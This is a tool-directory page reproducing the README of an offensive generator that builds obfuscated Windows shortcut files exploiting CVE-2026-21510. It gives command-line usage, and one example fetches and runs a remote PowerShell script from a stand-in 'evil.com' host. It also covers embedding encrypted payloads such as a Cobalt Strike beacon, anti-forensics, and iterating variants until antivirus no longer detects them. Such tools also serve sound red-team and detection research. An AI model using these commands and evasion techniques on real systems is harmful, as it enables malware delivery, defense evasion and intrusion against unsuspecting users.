Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
EpSiLoNPoInTlnk — Generates obfuscated .lnk files exploiting CVE-2026-21510 with LNK stomping, encrypted payloads, and anti-forensics for authorized penetration testing and red team operations. | Kitploit
Tools/GitHubGitHub/epsilonpointori/epsilonpointlnk
ExploitationWeb Application ExploitationMalware AnalysisPenetration TestingRed TeamingPayload DevelopmentAnti-Bot
GitHubepsilonpointori/epsilonpointlnk

EpSiLoNPoInTlnk

Generates obfuscated .lnk files exploiting CVE-2026-21510 with LNK stomping, encrypted payloads, and anti-forensics for authorized penetration testing and red team operations.

View Repository
2255 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

README EpSiLoNPoInTlnk CVE-2026-21510 - .LNK Generator Tool for generating .lnk files exploiting the CVE-2026-21510 vulnerability (Windows ShellLink Remote Code Execution). Designed for offensive security research, authorized penetration testing, and vulnerability analysis.

Legal Warning ⚠️ THIS TOOL IS INTENDED FOR LEGAL AND AUTHORIZED USE ONLY. Any unauthorized use against systems or networks would violate local and international laws (e.g., Computer Fraud and Abuse Act (CFAA), GDPR, Loi Godfrain in France). The author disclaims all responsibility for misuse. (See the Disclaimer below.)

Description This generator creates obfuscated .lnk files to exploit CVE-2026-21510, a vulnerability in Windows shortcut handling. It includes:

LNK Stomping (5 variants: dot, path_segment, relative, double_extension, unicode)

PropertyStore with random CLSIDs and PKEYs

KnownFolderDataBlock (random or targeted KnownFolderIDs)

EnvironmentVariableDataBlock (Unicode obfuscation, dynamic variables)

Obfuscation (Levels 1-5: TrackerDataBlock, ConsoleDataBlock, random blocks)

Embedded and encrypted payloads (AES-256-CBC + XOR)

Anti-Forensics (timestamps set to 0, file size set to 0, minimal metadata)

EDR/AV Bypass (legitimate processes, obfuscated PowerShell arguments)

Random variant generation (10+ unique variants to evade signatures)

Prerequisites System OS: Windows (to test the generated .lnk files) or Linux/macOS (for generation).

Python: ≥ 3.10. Dependencies: pip install pycryptodome

Recommended Tools Analysis: PEStudio, Detect It Easy (DIE)

Debugging: x64dbg, WinDbg

Testing: Isolated Windows virtual machine (e.g., Windows 10/11 on VirtualBox).

Installation Clone the repository: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk Install dependencies: pip install -r requirements.txt (Optional) Create a virtual environment: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows

Usage

  1. Basic Generation python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk Generates a .lnk file exploiting CVE-2026-21510 to launch calc.exe.

  2. Advanced Options Option Description Default value --target Target path (e.g., C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args Arguments for the target (e.g., /c whoami) /c calc.exe --output Output path for the .lnk file ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir Working directory C:\Windows\System32 --description Shortcut description Random string --unc Use a UNC path (?\C:...) False --lnk-stomping Enable LNK Stomping True --stomping-variant LNK Stomping variant (dot, path_segment, relative, double_extension, unicode, random) random --obfuscation Add useless ExtraData blocks True --obfuscation-level Obfuscation level (1-5) 5 --embed-payload Path to a file to embed (e.g., payload.bin) None --encrypt-payload Encrypt the payload (AES-256-CBC + XOR) True --anti-forensics Apply anti-forensics techniques True --randomize-clsid Randomize the CLSID in PropertyStore True --randomize-known-folder Randomize the KnownFolderID True --obfuscate-arguments Obfuscate arguments (PowerShell) True --generate-variants Generate N random variants 0 --debug Advanced debug mode (detailed logs) False

  3. Examples Example 1: Exploit with Embedded Payload python lnkstomperpoint.py
    --target "C:\Windows\System32\cmd.exe"
    --args "/c payload.exe"
    --embed-payload ./malware.bin
    --output exploit_with_payload.lnk
    --obfuscation-level 5
    --anti-forensics Generates a .lnk file with an encrypted (AES-256 + XOR) and obfuscated payload.

Example 2: Generating 10 Random Variants python lnkstomperpoint.py
--target "C:\Windows\System32\powershell.exe"
--args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
--generate-variants 10
--output-dir ./variants Creates 10 unique variants to evade EDR/AV signatures.

Example 3: Minimalist Mode (for testing) python lnkstomperpoint.py
--target "C:\Windows\System32\notepad.exe"
--obfuscation False
--anti-forensics False
--output minimal_exploit.lnk Generates a non-obfuscated .lnk file (for analysis or debugging).

Technical Operation

  1. .LNK Structure The generated .lnk file follows the MS-SHLLINK specification with the following extensions:

ShellLink Header (0x4C fixed bytes + offsets): LinkCLSID: 00021401-0000-0000-C000-000000000046 (mandatory). LinkFlags: Configured to enable HasRelativePath, HasWorkingDir, IsUnicode, etc.

StringData: RelativePath: Target path (with LNK Stomping if enabled). WorkingDir: Working directory (e.g., C:\Windows\System32). Arguments: Obfuscated arguments (PowerShell, cmd, etc.).

ExtraData Blocks (critical order): PropertyStoreDataBlock: Contains PKEY_AppUserModel_ID (random CLSID). KnownFolderDataBlock: Points to a system folder (e.g., %SystemRoot%). EnvironmentVariableDataBlock: Forces variable expansion before the Mark-of-the-Web (MotW). Obfuscation Blocks (depending on obfuscation_level): TrackerDataBlock (Level 1) ConsoleDataBlock (Level 2) DarwinDataBlock, ShimDataBlock, etc. (Levels 3-5)

Embedded Payload (if --embed-payload): Encrypted with AES-256-CBC + XOR.

  1. Bypass Techniques Technique Description Impact LNK Stomping Adds invisible characters (., , \u202e) to the target path. Bypasses detections based on path signatures. PropertyStore Uses PKEYs with random CLSIDs to evade signatures. Avoids YARA/EDR rules targeting known CLSIDs. KnownFolder Points to system folders (%SystemRoot%, %Temp%). Bypasses absolute path restrictions. EnvironmentVariable Obfuscates the path with variables (%TEMP%, %APPDATA%). Avoids static detections. Obfuscation Level 5 Adds random ExtraData blocks and padding. Makes static analysis difficult. Anti-Forensics Sets timestamps, file size, etc., to 0. Complicates forensic analysis. Obfuscated Arguments Uses PowerShell techniques (Base64, XOR, Reverse). Bypasses malicious command detections.
  2. Payload Encryption If --embed-payload is enabled:

The payload is encrypted with AES-256-CBC (random 32-byte key, 16-byte IV).

An XOR layer is applied using the first 16 bytes of the AES key.

The key and IV are stored in a ShimDataBlock for later decryption.

Testing and Validation

  1. Automatic Validation The generator includes a _validate() function that checks:

The minimum file size.

The validity of the HeaderSize and CLSID.

The presence of the required LinkFlags.

The structure of the ExtraData blocks (PropertyStore, KnownFolder, etc.).

  1. Manual Tests Static Analysis: Use PEStudio to verify the .lnk structure. Check that the ExtraData blocks are properly present.

Execution (in an isolated environment): Double-click the .lnk file and observe the behavior. Use Process Monitor (ProcMon) to analyze system calls.

EDR/AV Detection: Test with tools like Windows Defender or CrowdStrike. If the .lnk file is detected, increase the obfuscation_level or disable certain options.

Use Cases Scenario Command Description Penetration Test --target "C:\Windows\System32\cmd.exe" --args "/c whoami" Checks whether the exploit works on a target machine. Red Team --embed-payload ./cobaltstrike_beacon.bin --obfuscation-level 5 Generates a .lnk file with an obfuscated Cobalt Strike payload. Research --generate-variants 50 --output-dir ./samples Creates 50 variants to test EDR detections. Debug --debug --obfuscation False Displays detailed logs to analyze the .lnk structure. Contributions Contributions are welcome! Here is how to contribute:

Fork the project.

Create a branch (git checkout -b feature/my-new-feature).

Commit your changes (git commit -m "Added feature X").

Push to the branch (git push origin feature/my-new-feature).

Open a Pull Request. Contribution Ideas:

Add new LNK Stomping variants.

Implement other encryption algorithms (e.g., ChaCha20).

Improve argument obfuscation (e.g., using JScript).

Add unit tests to validate .lnk structures.

Download Tool